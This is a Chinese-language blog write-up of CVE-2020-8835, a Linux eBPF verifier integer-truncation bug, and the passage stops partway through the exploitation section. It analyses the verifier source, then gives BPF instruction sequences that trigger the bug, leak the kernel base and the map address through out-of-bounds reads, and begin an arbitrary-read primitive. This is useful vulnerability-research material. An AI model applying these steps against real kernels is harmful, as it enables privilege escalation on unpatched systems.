CVE-2020-8835：eBPF verifier 整数截断导致的越界读写

文章目录

前言
漏洞分析
- do_check 函数
漏洞利用
- 漏洞触发
- 越界读实现地址泄漏
- 越界写实现任意读
- 越界写实现任意写
exp 即效果演示
参考

前言

影响版本：v5.4.7 ~ v5.5.0 以及更新的版本，如 5.6
编译选项：CONFIG_BPF_SYSCALL，config 所有带 BPF 字样的编译选项
漏洞概述：该漏洞是在 commit 581738a681b6 中引入，verifier 没有正确地将64位值转换为32位（直接取低32位），使得 BPF 寄存器的值在代码验证阶段和实际执行阶段不一致，导致越界读写
测试环境：测试环境 linux-5.6.0

漏洞分析

ebpf 程序在被加载到内核后，首先会模拟执行一遍以此检查 ebpf 中可能出现的错误或者恶意代码。而 verifier 会对 ebpf 进行静态检查，漏洞调用链如下：

bpf_check
	do_check_main
		do_check_common
			do_check
				check_cond_jmp_op
					reg_set_min_max

在 bpf_prog_load 中可以看到这里会执行 verifier -- bpf_check ：

static int bpf_prog_load(union bpf_attr *attr, union bpf_attr __user *uattr)
{
......
	/* run eBPF verifier */
	err = bpf_check(&prog, attr, uattr);
	if (err < 0)
		goto free_used_maps;
......
}

bpf_check 会调用到 do_check_main 函数：

int bpf_check(struct bpf_prog **prog, union bpf_attr *attr,
	      union bpf_attr __user *uattr)
{
......
	ret = check_cfg(env);
	if (ret < 0)
		goto skip_full_check;

	ret = do_check_subprogs(env);
	ret = ret ?: do_check_main(env);

	if (ret == 0 && bpf_prog_is_dev_bound(env->prog->aux))
		ret = bpf_prog_offload_finalize(env);

......
}

do_check_main 主要就是调用了 do_check_common 函数：

static int do_check_main(struct bpf_verifier_env *env)
{
	int ret;

	env->insn_idx = 0;
	ret = do_check_common(env, 0);
	if (!ret)
		env->prog->aux->stack_depth = env->subprog_info[0].stack_depth;
	return ret;
}

do_check_common 最后会调用到 do_check 函数：

static int do_check_common(struct bpf_verifier_env *env, int subprog)
{
......
	ret = do_check(env);
......
}

最后的漏洞也是出现在 do_check 函数中，所以这里重点看下 do_check 函数。

do_check 函数

do_check 函数有点长，这里我还是重点看漏洞出现的执行分支：

static int do_check(struct bpf_verifier_env *env)
{
	struct bpf_verifier_state *state = env->cur_state;
	struct bpf_insn *insns = env->prog->insnsi;
	struct bpf_reg_state *regs;
	int insn_cnt = env->prog->len;
	bool do_print_state = false;
	int prev_insn_idx = -1;
	// 遍历每一条指令
	for (;;) {
		struct bpf_insn *insn;
		u8 class;
		int err;

		env->prev_insn_idx = prev_insn_idx; // 前一条指令 idx
		if (env->insn_idx >= insn_cnt) { // insn_cnt 为指令总数量
			verbose(env, "invalid insn idx %d insn_cnt %d\n", env->insn_idx, insn_cnt);
			return -EFAULT;
		}

		insn = &insns[env->insn_idx]; // 获取指令
		class = BPF_CLASS(insn->code); // 获取指令类型
		// 指令数量有限制
		if (++env->insn_processed > BPF_COMPLEXITY_LIMIT_INSNS) {
			verbose(env, "BPF program is too large. Processed %d insn\n", env->insn_processed);
			return -E2BIG;
		}
		// 该指令是否处理过
		err = is_state_visited(env, env->insn_idx);
		if (err < 0)
			return err;
		if (err == 1) {
			/* found equivalent state, can prune the search */
			if (env->log.level & BPF_LOG_LEVEL) {
					// log 相关的东西
			}
			goto process_bpf_exit;
		}

		if (signal_pending(current))
			return -EAGAIN;

		if (need_resched())
			cond_resched();
		// log 相关的东西
		if (env->log.level & BPF_LOG_LEVEL2 ||
		    (env->log.level & BPF_LOG_LEVEL && do_print_state)) {
				......
		}

		if (env->log.level & BPF_LOG_LEVEL) {
			// log 相关的东西
			......
		}

		if (bpf_prog_is_dev_bound(env->prog->aux)) {
			err = bpf_prog_offload_verify_insn(env, env->insn_idx,
							   env->prev_insn_idx);
			if (err)
				return err;
		}

		regs = cur_regs(env);
		env->insn_aux_data[env->insn_idx].seen = env->pass_cnt;
		prev_insn_idx = env->insn_idx;
		// 下面就是针对不同的指令类型进行不同的检查处理了
		// 这里我们主要关注跳转指令，这里也是漏洞分支
		if (class == BPF_ALU || class == BPF_ALU64) {
			err = check_alu_op(env, insn);
			if (err) return err;
		} else if (class == BPF_LDX) {
			enum bpf_reg_type *prev_src_type, src_reg_type;
			err = check_reg_arg(env, insn->src_reg, SRC_OP);
			if (err) return err;
			err = check_reg_arg(env, insn->dst_reg, DST_OP_NO_MARK);
			if (err) return err;
			src_reg_type = regs[insn->src_reg].type;
			err = check_mem_access(env, env->insn_idx, insn->src_reg,
					       insn->off, BPF_SIZE(insn->code),
					       BPF_READ, insn->dst_reg, false);
			......
		} else if (class == BPF_STX) {
			enum bpf_reg_type *prev_dst_type, dst_reg_type;

			if (BPF_MODE(insn->code) == BPF_XADD) {
				err = check_xadd(env, env->insn_idx, insn);
				if (err) return err;
				env->insn_idx++;
				continue;
			}

			/* check src1 operand */
			err = check_reg_arg(env, insn->src_reg, SRC_OP);
			if (err) return err;
			/* check src2 operand */
			err = check_reg_arg(env, insn->dst_reg, SRC_OP);
			if (err) return err;
			dst_reg_type = regs[insn->dst_reg].type;
			/* check that memory (dst_reg + off) is writeable */
			err = check_mem_access(env, env->insn_idx, insn->dst_reg,
					       insn->off, BPF_SIZE(insn->code),
					       BPF_WRITE, insn->src_reg, false);
			......

		} else if (class == BPF_ST) {
				......
		} else if (class == BPF_JMP || class == BPF_JMP32) {
			// 针对跳转指令的处理，有 32 位跳转和 64 位跳转
			u8 opcode = BPF_OP(insn->code);
			env->jmps_processed++;
			if (opcode == BPF_CALL) {
				// call 指令
				......
			} else if (opcode == BPF_JA) {
				// ja 指令
				......
			} else if (opcode == BPF_EXIT) {
				// exit 指令
				......
process_bpf_exit:
				......
			} else {
				// 条件跳转指令
				err = check_cond_jmp_op(env, insn, &env->insn_idx);
				if (err) return err;
			}
		} else if (class == BPF_LD) {
			......
		} else {
			verbose(env, "unknown insn class %d\n", class);
			return -EINVAL;
		}

		env->insn_idx++;
	}
	return 0;
}

条件跳转指令会由 check_cond_jmp_op 函数进行处理：

static int check_cond_jmp_op(struct bpf_verifier_env *env,
			     struct bpf_insn *insn, int *insn_idx)
{
	struct bpf_verifier_state *this_branch = env->cur_state;
	struct bpf_verifier_state *other_branch;
	struct bpf_reg_state *regs = this_branch->frame[this_branch->curframe]->regs;
	struct bpf_reg_state *dst_reg, *other_branch_regs, *src_reg = NULL;
	u8 opcode = BPF_OP(insn->code);
	bool is_jmp32;
	int pred = -1;
	int err;

	/* Only conditional jumps are expected to reach here. */
	// 检查是否是 >条件分支跳转<
	if (opcode == BPF_JA || opcode > BPF_JSLE) {
		verbose(env, "invalid BPF_JMP/JMP32 opcode %x\n", opcode);
		return -EINVAL;
	}
	// 操作数是寄存器
	if (BPF_SRC(insn->code) == BPF_X) {
		if (insn->imm != 0) {
			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
			return -EINVAL;
		}

		/* check src1 operand */
		err = check_reg_arg(env, insn->src_reg, SRC_OP);
		if (err) return err;

		if (is_pointer_value(env, insn->src_reg)) {
			verbose(env, "R%d pointer comparison prohibited\n", insn->src_reg);
			return -EACCES;
		}
		src_reg = &regs[insn->src_reg];
	// 操作数是立即数
	} else {
		// src_reg 必须是 0
		if (insn->src_reg != BPF_REG_0) {
			verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
			return -EINVAL;
		}
	}

	/* check src2 operand */
	err = check_reg_arg(env, insn->dst_reg, SRC_OP);
	if (err) return err;
	// 获取目的寄存器 dst_reg
	dst_reg = &regs[insn->dst_reg];
	// 是否 jmp32
	is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
	// is_branch_taken 主要就是检查分支是否可以预测
	// 比如这里是立即数跳转：dst_reg 寄存器的 umin = 1, umax = 7，而 imm = 0
	// 那么对于 jle dst_reg imm off 而言：dst_reg.umin > imm，所以这里可以肯定不会跳转
	// 所以为了使得 pred = -1，就得让 dst_reg 为 uknown
	// 这里可以从 map 中加载数据到 dst_reg 中使得 dst_reg 为 unknown
	if (BPF_SRC(insn->code) == BPF_K)
		pred = is_branch_taken(dst_reg, insn->imm, opcode, is_jmp32);
	else if (src_reg->type == SCALAR_VALUE && tnum_is_const(src_reg->var_off))
		pred = is_branch_taken(dst_reg, src_reg->var_off.value, opcode, is_jmp32);
	if (pred >= 0) {
		err = mark_chain_precision(env, insn->dst_reg);
		if (BPF_SRC(insn->code) == BPF_X && !err)
			err = mark_chain_precision(env, insn->src_reg);
		if (err) return err;
	}
	// 可以看到这里的 if-else pred = 0/1 都会直接返回
	// 为了使得向下执行，得让 pred = -1，即寄存器为 unknown
	if (pred == 1) {
		/* only follow the goto, ignore fall-through */
		*insn_idx += insn->off;
		return 0;
	} else if (pred == 0) {
		/* only follow fall-through branch, since
		 * that's where the program will go
		 */
		return 0;
	}
	// 保存另一个分支
	other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx, false);
	if (!other_branch)
		return -EFAULT;
	// 获取另一个分支寄存器的状态
	other_branch_regs = other_branch->frame[other_branch->curframe]->regs;

	/* detect if we are comparing against a constant value so we can adjust
	 * our min/max values for our dst register.
	 * this is only legit if both are scalars (or pointers to the same
	 * object, I suppose, but we don't support that right now), because
	 * otherwise the different base pointers mean the offsets aren't
	 * comparable.
	 */
	// 操作数是寄存器
	if (BPF_SRC(insn->code) == BPF_X) {
		struct bpf_reg_state *src_reg = &regs[insn->src_reg];
		struct bpf_reg_state lo_reg0 = *dst_reg;
		struct bpf_reg_state lo_reg1 = *src_reg;
		struct bpf_reg_state *src_lo, *dst_lo;

		dst_lo = &lo_reg0;
		src_lo = &lo_reg1;
		coerce_reg_to_size(dst_lo, 4);
		coerce_reg_to_size(src_lo, 4);

		if (dst_reg->type == SCALAR_VALUE &&
		    src_reg->type == SCALAR_VALUE) {
			if (tnum_is_const(src_reg->var_off) ||
			    (is_jmp32 && tnum_is_const(src_lo->var_off)))
				reg_set_min_max(&other_branch_regs[insn->dst_reg],
						dst_reg,
						is_jmp32
						? src_lo->var_off.value
						: src_reg->var_off.value,
						opcode, is_jmp32);
			else if (tnum_is_const(dst_reg->var_off) ||
				 (is_jmp32 && tnum_is_const(dst_lo->var_off)))
				reg_set_min_max_inv(&other_branch_regs[insn->src_reg],
						    src_reg,
						    is_jmp32
						    ? dst_lo->var_off.value
						    : dst_reg->var_off.value,
						    opcode, is_jmp32);
			else if (!is_jmp32 &&
				 (opcode == BPF_JEQ || opcode == BPF_JNE))
				/* Comparing for equality, we can combine knowledge */
				reg_combine_min_max(&other_branch_regs[insn->src_reg],
						    &other_branch_regs[insn->dst_reg],
						    src_reg, dst_reg, opcode);
		}
	} else if (dst_reg->type == SCALAR_VALUE) {
	// 操作数是立即数，这里是直接调用了 reg_set_min_max 进行处理
		reg_set_min_max(&other_branch_regs[insn->dst_reg], dst_reg, insn->imm, opcode, is_jmp32);
	}

	/* detect if R == 0 where R is returned from bpf_map_lookup_elem().
	 * NOTE: these optimizations below are related with pointer comparison
	 *       which will never be JMP32.
	 */
	if (!is_jmp32 && BPF_SRC(insn->code) == BPF_K &&
	    insn->imm == 0 && (opcode == BPF_JEQ || opcode == BPF_JNE) &&
	    reg_type_may_be_null(dst_reg->type)) {
		/* Mark all identical registers in each branch as either
		 * safe or unknown depending R == 0 or R != 0 conditional.
		 */
		mark_ptr_or_null_regs(this_branch, insn->dst_reg, opcode == BPF_JNE);
		mark_ptr_or_null_regs(other_branch, insn->dst_reg, opcode == BPF_JEQ);
	} else if (!try_match_pkt_pointers(insn, dst_reg, &regs[insn->src_reg], this_branch, other_branch) & is_pointer_value(env, insn->dst_reg)) {
		verbose(env, "R%d pointer comparison prohibited\n", insn->dst_reg);
		return -EACCES;
	}
	if (env->log.level & BPF_LOG_LEVEL)
		print_verifier_state(env, this_branch->frame[this_branch->curframe]);
	return 0;
}

可以看到针对立即数条件跳转指令，调用了 reg_set_min_max 进行处理：

这里得说明一下，这里的 true_reg 其实就是 dst_reg，通过调试可以验证

/* Adjusts the register min/max values in the case that the dst_reg is the
 * variable register that we are working on, and src_reg is a constant or we're
 * simply doing a BPF_K check.
 * In JEQ/JNE cases we also adjust the var_off values.
 */
static void reg_set_min_max(struct bpf_reg_state *true_reg,
			    struct bpf_reg_state *false_reg, u64 val,
			    u8 opcode, bool is_jmp32)
{
	s64 sval;

	/* If the dst_reg is a pointer, we can't learn anything about its
	 * variable offset from the compare (unless src_reg were a pointer into
	 * the same object, but we don't bother with that.
	 * Since false_reg and true_reg have the same type by construction, we
	 * only need to check one of them for pointerness.
	 */
	if (__is_pointer_value(false, false_reg))
		return;

	val = is_jmp32 ? (u32)val : val;
	sval = is_jmp32 ? (s64)(s32)val : (s64)val;

	switch (opcode) {
	case BPF_JEQ:
	case BPF_JNE:
	{
		struct bpf_reg_state *reg = opcode == BPF_JEQ ? true_reg : false_reg;

		/* For BPF_JEQ, if this is false we know nothing Jon Snow, but
		 * if it is true we know the value for sure. Likewise for
		 * BPF_JNE.
		 */
		if (is_jmp32) {
			u64 old_v = reg->var_off.value;
			u64 hi_mask = ~0xffffffffULL;

			reg->var_off.value = (old_v & hi_mask) | val;
			reg->var_off.mask &= hi_mask;
		} else {
			__mark_reg_known(reg, val);
		}
		break;
	}
	case BPF_JSET:
		false_reg->var_off = tnum_and(false_reg->var_off, tnum_const(~val));
		if (is_power_of_2(val))
			true_reg->var_off = tnum_or(true_reg->var_off, tnum_const(val));
		break;
	case BPF_JGE:
	case BPF_JGT:
	{
		// BPF_JGE change true_reg.umin_value
		u64 false_umax = opcode == BPF_JGT ? val    : val - 1;
		u64 true_umin = opcode == BPF_JGT ? val + 1 : val;

		if (is_jmp32) {
			false_umax += gen_hi_max(false_reg->var_off);
			true_umin += gen_hi_min(true_reg->var_off);
		}
		false_reg->umax_value = min(false_reg->umax_value, false_umax);
		true_reg->umin_value = max(true_reg->umin_value, true_umin);
		break;
	}
	case BPF_JSGE:
	case BPF_JSGT:
	{
		s64 false_smax = opcode == BPF_JSGT ? sval    : sval - 1;
		s64 true_smin = opcode == BPF_JSGT ? sval + 1 : sval;

		/* If the full s64 was not sign-extended from s32 then don't
		 * deduct further info.
		 */
		if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
			break;
		false_reg->smax_value = min(false_reg->smax_value, false_smax);
		true_reg->smin_value = max(true_reg->smin_value, true_smin);
		break;
	}
	case BPF_JLE:
	case BPF_JLT:
	{
		u64 false_umin = opcode == BPF_JLT ? val    : val + 1;
		u64 true_umax = opcode == BPF_JLT ? val - 1 : val;

		if (is_jmp32) {
			false_umin += gen_hi_min(false_reg->var_off);
			true_umax += gen_hi_max(true_reg->var_off);
		}
		false_reg->umin_value = max(false_reg->umin_value, false_umin);
		true_reg->umax_value = min(true_reg->umax_value, true_umax);
		break;
	}
	case BPF_JSLE:
	case BPF_JSLT:
	{
		s64 false_smin = opcode == BPF_JSLT ? sval    : sval + 1;
		s64 true_smax = opcode == BPF_JSLT ? sval - 1 : sval;

		if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
			break;
		false_reg->smin_value = max(false_reg->smin_value, false_smin);
		true_reg->smax_value = min(true_reg->smax_value, true_smax);
		break;
	}
	default:
		break;
	}

	__reg_deduce_bounds(false_reg);
	__reg_deduce_bounds(true_reg);
	/* We might have learned some bits from the bounds. */
	__reg_bound_offset(false_reg);
	__reg_bound_offset(true_reg);
	if (is_jmp32) {
		__reg_bound_offset32(false_reg);
		__reg_bound_offset32(true_reg);
	}
	/* Intersecting with the old var_off might have improved our bounds
	 * slightly.  e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
	 * then new var_off is (0; 0x7f...fc) which improves our umax.
	 */
	__update_reg_bounds(false_reg);
	__update_reg_bounds(true_reg);
}

主要来看下 __reg_bound_offset32 函数：

// min = 1, max = 1 0000 0001
// min & mask = 1, max & mask = 1 
struct tnum tnum_range(u64 min, u64 max)
{
	// chi = min ^ max = 0
	u64 chi = min ^ max, delta;
	// fls64() 从 lsb->masb 取二进制中第一个 1 的位置
	// eg: 5 = (101)2 ==> fls64(5) = 1
	// bits = fls64(chi) = 0
	u8 bits = fls64(chi);

	/* special case, needed because 1ULL << 64 is undefined */
	if (bits > 63)
		return tnum_unknown;
	/* e.g. if chi = 4, bits = 3, delta = (1<<3) - 1 = 7.
	 * if chi = 0, bits = 0, delta = (1<<0) - 1 = 0, so we return
	 *  constant min (since min == max).
	 */
	// delta = (1ULL << 0) - 1 = 0;
	delta = (1ULL << bits) - 1;
	// { value = 1, mask = 0 }
	return TNUM(min & ~delta, delta);
}

static void __reg_bound_offset32(struct bpf_reg_state *reg)
{
	// 传入 tnum_range 的参数直接去掉了高 32 bits 数据
	u64 mask = 0xffffFFFF;
	// umin_value = 1, umax_value = 1 0000 0001
	// range = { value = 1, mask = 0 }
	struct tnum range = tnum_range(reg->umin_value & mask, reg->umax_value & mask);
	// 取低 32 位 
	struct tnum lo32 = tnum_cast(reg->var_off, 4);
	// 取高 32 位
	struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);
/*
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
	u64 v, mu;

	v = a.value | b.value;
	mu = a.mask & b.mask;
	return TNUM(v & ~mu, mu);
}

struct tnum tnum_or(struct tnum a, struct tnum b)
{
	u64 v, mu;

	v = a.value | b.value;
	mu = a.mask | b.mask;
	return TNUM(v, mu & ~v);
}
*/
	// tnum_intersect(lo32, range) ==> { value = lo32.value | 1, mask = 0 }
	// tnum_or(hi32, ) ==> { value = hi32.value | lo32.value | 1, hi32.mask }
	// 最后  reg->var_off.mask_lo32 = 0, reg->var_off.mask_hi32 = hi32.mask
	//		reg->var_off.value_lo32 = 1, reg->var_off.mask_hi32 = hi32_value
	reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
}

这里请看注释漏洞很明显了，这里对于一个寄存器 dst_reg，其 umin = 1, umax = 0x1 0000 0001，再经过 __reg_bound_offset32 处理后，其 var_off 被设置了 { value = 0xXXXX XXXX 0000 0001, mask = 0xXXXX XXXX 0000 0000 } ，即这里的低 32 位是确定了的。

所以问题就来了，这里的 dst_reg 不一定就是确认的，正如上述所说，我们可以从 map 中加载值到 dst_reg 中，所以此时 dst_reg 的值是可以变了，经过 __reg_bound_offset32 处理后，其却变成了一个确定的值。

漏洞利用

漏洞触发

注意事项：

想要执行到 reg_set_min_max 路径，必须绕过 is_branch_taken，即 dst_reg 应该是不确定的
要让 dst_reg.umin = 1, dst_reg_umax = 0x1 0000 0001

问题1解决方案
加载 map 的值到 dst_reg 中：
在这里插入图片描述
可以看到 dst_reg = reg6 的 var_off 是 unknown 的，其可以执行到 reg_set_min_max：

问题2解决方案
这里得重新回到 reg_set_min_max 函数：

static void reg_set_min_max(struct bpf_reg_state *true_reg,
			    struct bpf_reg_state *false_reg, u64 val,
			    u8 opcode, bool is_jmp32)
{
	s64 sval;
	if (__is_pointer_value(false, false_reg))
		return;

	val = is_jmp32 ? (u32)val : val;
	sval = is_jmp32 ? (s64)(s32)val : (s64)val;

	switch (opcode) {
	case BPF_JEQ:
	case BPF_JNE:
......
	case BPF_JSET:
......
	case BPF_JGE:
	case BPF_JGT:
	{
		// BPF_JGE change true_reg.umin_value
		u64 false_umax = opcode == BPF_JGT ? val    : val - 1;
		u64 true_umin = opcode == BPF_JGT ? val + 1 : val;

		if (is_jmp32) {
			false_umax += gen_hi_max(false_reg->var_off);
			true_umin += gen_hi_min(true_reg->var_off);
		}
		false_reg->umax_value = min(false_reg->umax_value, false_umax);
		true_reg->umin_value = max(true_reg->umin_value, true_umin);
		break;
	}
	case BPF_JSGE:
	case BPF_JSGT:
......
	case BPF_JLE:
	case BPF_JLT:
	{
		u64 false_umin = opcode == BPF_JLT ? val    : val + 1;
		u64 true_umax = opcode == BPF_JLT ? val - 1 : val;

		if (is_jmp32) {
			false_umin += gen_hi_min(false_reg->var_off);
			true_umax += gen_hi_max(true_reg->var_off);
		}
		false_reg->umin_value = max(false_reg->umin_value, false_umin);
		true_reg->umax_value = min(true_reg->umax_value, true_umax);
		break;
	}
	case BPF_JSLE:
	case BPF_JSLT:
......
	default:
		break;
	}

	__reg_deduce_bounds(false_reg);
	__reg_deduce_bounds(true_reg);
	/* We might have learned some bits from the bounds. */
	__reg_bound_offset(false_reg);
	__reg_bound_offset(true_reg);
	if (is_jmp32) {
		__reg_bound_offset32(false_reg);
		__reg_bound_offset32(true_reg);
	}
	__update_reg_bounds(false_reg);
	__update_reg_bounds(true_reg);
}

看到这里的第 1/2 个参数，分别是 true_reg 和 false_reg，我们将断点打在这个函数这里，然后查看其参数：
在这里插入图片描述
可以发现这里的 true_reg 就是 dst_reg，所以我们可以在 reg_set_min_max 函数中利用 BPF_JGT 和 BPF_JLT 修改 dst_reg 的 umin/umax

1、修改 dst_reg.umin = 1
这里很简单，在 reg_set_min_max 中，可以看到：

	case BPF_JGE:
	case BPF_JGT:
	{
		// BPF_JGE change true_reg.umin_value
		// val = insn->imm = imm
		u64 false_umax = opcode == BPF_JGT ? val    : val - 1;
		u64 true_umin = opcode == BPF_JGT ? val + 1 : val;

		if (is_jmp32) {
			false_umax += gen_hi_max(false_reg->var_off);
			true_umin += gen_hi_min(true_reg->var_off);
		}
		false_reg->umax_value = min(false_reg->umax_value, false_umax);
		true_reg->umin_value = max(true_reg->umin_value, true_umin);
		break;
	}

所以我们可以通过如下指令去设置 dst_reg.umin = 1：这里的 dst_reg 为 reg6

BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1)

执行完后，可以看到 umin 成功被修改为 1：
在这里插入图片描述
2、修改 dst_reg.umax = 0x1 0000 0001
这里如果我们参考修改 umin 的话，你会发现一个问题，即这里的 val = 0x1 0000 0001，而 imm 是 int 类型，所以这里是无法直接利用立即数条件跳转的

所以这里还是得回到 check_cond_jmp_op 函数：

if (BPF_SRC(insn->code) == BPF_X) {
		struct bpf_reg_state *src_reg = &regs[insn->src_reg];
		struct bpf_reg_state lo_reg0 = *dst_reg;
		struct bpf_reg_state lo_reg1 = *src_reg;
		struct bpf_reg_state *src_lo, *dst_lo;

		dst_lo = &lo_reg0;
		src_lo = &lo_reg1;
		coerce_reg_to_size(dst_lo, 4);
		coerce_reg_to_size(src_lo, 4);

		if (dst_reg->type == SCALAR_VALUE &&
		    src_reg->type == SCALAR_VALUE) {
			if (tnum_is_const(src_reg->var_off) ||
			    (is_jmp32 && tnum_is_const(src_lo->var_off)))
				reg_set_min_max(&other_branch_regs[insn->dst_reg],
						dst_reg,
						is_jmp32
						? src_lo->var_off.value
						: src_reg->var_off.value,
						opcode, is_jmp32);
			else if (tnum_is_const(dst_reg->var_off) ||
				 (is_jmp32 && tnum_is_const(dst_lo->var_off)))
				......
			else if (!is_jmp32 &&
				 (opcode == BPF_JEQ || opcode == BPF_JNE))
				......
		}
	} else if (dst_reg->type == SCALAR_VALUE) {
		reg_set_min_max(&other_branch_regs[insn->dst_reg],
					dst_reg, insn->imm, opcode, is_jmp32);
	}

可以看到这里针对寄存器条件跳转的处理，当 src_reg->var_off 是一个确定的值时，其会调用：

reg_set_min_max(&other_branch_regs[insn->dst_reg],
						dst_reg,
						is_jmp32
						? src_lo->var_off.value
						: src_reg->var_off.value,
						opcode, is_jmp32);

这里我们如果执行 64 位跳转，则执行函数如下：

reg_set_min_max(&other_branch_regs[insn->dst_reg],
						dst_reg, src_reg->var_off.value, opcode, is_jmp32);

然后就和立即数跳转跳转类似了，不同的是，立即数条件跳转 val 传入的是 imm，而这里 val 传入的是 src_reg->var_off.value，而 imm 是 int 类型，但是 src_reg->var_off.value 是 64 位的。

通过以下代码修改 umax：

BPF_MOV64_IMM(BPF_REG_8, 1), 
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), 
BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 1), 
BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_8, 1),

可能这里笔者会疑惑？为什么不直接设置 src_reg = r8 = 0x1 0000 0001 呢？因为 imm 为 int 类型

调试跟踪：
在这里插入图片描述
执行 JLE 处理后：

漏洞触发
漏洞触发比较简单，使用 JMP32 即可，同样 dst_reg 要求 unknown：

BPF_JMP32_IMM(BPF_JNE, BPF_REG_6, 5, 1),

效果如下：
在这里插入图片描述
可以看到 dst_reg 只有第 32 位不确定，其它位都是确定的。这里为了消除第 32 位的影响，我们使用 AND 操作：

BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2),
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1),

这里 r6 & 2，虽然 r6 的第 32 位是不确定的，但是 2 的第 32 位为 0，所以不管 r6 的第 32 位是 1 还是 0，这里 r6 & 2 的结果都是 0，然后再 r6 >> 1 也是恒为 0 了：
在这里插入图片描述
但是这里是存在问题的，因为 r6 的值是从 map 中加载的，所以这里我们可以设置 r6 = 2，所以真实的情况是：r6 & 2 = 2 & 2 = 2，然后 r6 >>1 = 2 >> 1 = 1。所以实际运行时 r6 = 1 而不是 r6 = 0。

越界读实现地址泄漏

这里主要通过越界读泄漏 kernel base 和 map _addr

这里借助 ebpf 的一个助手函数 bpf_map_lookup_elem_proto

BPF_CALL_2(bpf_map_lookup_elem, struct bpf_map *, map, void *, key)
{
	WARN_ON_ONCE(!rcu_read_lock_held());
	return (unsigned long) map->ops->map_lookup_elem(map, key);
}

const struct bpf_func_proto bpf_map_lookup_elem_proto = {
	.func		= bpf_map_lookup_elem,
	.gpl_only	= false,
	.pkt_access	= true,
	.ret_type	= RET_PTR_TO_MAP_VALUE_OR_NULL,
	.arg1_type	= ARG_CONST_MAP_PTR,
	.arg2_type	= ARG_PTR_TO_MAP_KEY,
};

可以看到 bpf_map_lookup_elem 函数直接调用了 map->ops->map_lookup_elem(map, key)，struct bpf_map 定义如下：
在这里插入图片描述
可以看到其第一个域为一个 bpf_map_ops，这里我们创建的是 array map，所以 bpf_map_ops 为 array_map_ops：

const struct bpf_map_ops array_map_ops = {
	.map_alloc_check = array_map_alloc_check,
	.map_alloc = array_map_alloc,
	.map_free = array_map_free,
	.map_get_next_key = array_map_get_next_key,
	.map_lookup_elem = array_map_lookup_elem,
	.map_update_elem = array_map_update_elem,
	.map_delete_elem = array_map_delete_elem,
	.map_gen_lookup = array_map_gen_lookup,
	.map_direct_value_addr = array_map_direct_value_addr,
	.map_direct_value_meta = array_map_direct_value_meta,
	.map_mmap = array_map_mmap,
	.map_seq_show_elem = array_map_seq_show_elem,
	.map_check_btf = array_map_check_btf,
};

所以 map->ops->map_lookup_elem 就是 array_map_lookup_elem 函数：

static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	u32 index = *(u32 *)key;

	if (unlikely(index >= array->map.max_entries))
		return NULL;

	return array->value + array->elem_size * (index & array->index_mask);
}

可以看到 map [struct bpf_map] 其实是 array [struct bpf_array] 的一个成员，struct bpf_array 定义如下：
在这里插入图片描述
有趣的来啦，array_map_lookup_elem 读取的 value 域在 map 的下方，所以这里通过越界读取是可以直接读取 map 中的内容的，所以这里就可以直接读取 map.bpf_map_ops 去泄漏内核基地址了。而 value 的起始地址相对 map 起始地址为 0x110，所以可以通过如下指令进行越界读取：

BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),

经过上面的分析我们知道，在验证阶段 r6 = 0，所以 r6*0x110 = 0，而实际运行时 r6 = 1，所以 r6*0x110=0x110。这时候如果我们读取 value[-r6] 是可以通过验证的，因为验证阶段当作了 value[-0] = value[0]，但是在实际运行时读取的是 value[-0x110]，从而直接泄漏 bpf_map_ops

哪现在如何泄漏 map_addr 地址呢【这里泄漏 map_addr 主要是为后面任意写做准备的】？在 bpf_map 中，保存着自己的地址：
在这里插入图片描述
所以我们也可以通过越界读取直接泄漏 map_addr

越界写实现任意读

BPF Type Format（BTF）是一种元数据格式，用于给 eBPF 提供一些额外的信息，在内核中使用 btf 结构体表示一条 btf 信息：

struct btf {
	void *data;
	struct btf_type **types;
	u32 *resolved_ids;
	u32 *resolved_sizes;
	const char *strings;
	void *nohdr_data;
	struct btf_header hdr;
	u32 nr_types; /* includes VOID for base BTF */
	u32 types_size;
	u32 data_size;
	refcount_t refcnt;
	u32 id;
	struct rcu_head rcu;

	/* split BTF support */
	struct btf *base_btf;
	u32 start_id; /* first type ID in this BTF (0 for base BTF) */
	u32 start_str_off; /* first string offset (0 for base BTF) */
	char name[MODULE_NAME_LEN];
	bool kernel_btf;
};

注意到在 bpf_map 当中刚好有一个指向 struct btf 的指针：
在这里插入图片描述
bpf_map->btf 在什么时候会被访问到？注意到 bpf 系统调用给我们提供的选项中有一个为 BPF_OBJ_GET_INFO_BY_FD：

SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr __user *, uattr, unsigned int, size)
{
	//...

	switch (cmd) {
	//...
	case BPF_OBJ_GET_INFO_BY_FD:
		err = bpf_obj_get_info_by_fd(&attr, uattr);
		break;

对于 amap 类型而言最终会调用到 bpf_map_get_info_by_fd() ，在该函数中会把 bpf_map->btf.id 拷贝给用户空间：

static int bpf_map_get_info_by_fd(struct file *file,
				  struct bpf_map *map,
				  const union bpf_attr *attr,
				  union bpf_attr __user *uattr)
{
	//...

	if (map->btf) {
		info.btf_id = btf_obj_id(map->btf);
		info.btf_key_type_id = map->btf_key_type_id;
		info.btf_value_type_id = map->btf_value_type_id;
	}
	//...

	if (copy_to_user(uinfo, &info, info_len) ||
	    put_user(info_len, &uattr->info.info_len))
		return -EFAULT;

	return 0;
}

static int bpf_obj_get_info_by_fd(const union bpf_attr *attr,
				  union bpf_attr __user *uattr)
{
	int ufd = attr->info.bpf_fd;
	struct fd f;
	int err;

	if (CHECK_ATTR(BPF_OBJ_GET_INFO_BY_FD))
		return -EINVAL;

	f = fdget(ufd);
	if (!f.file)
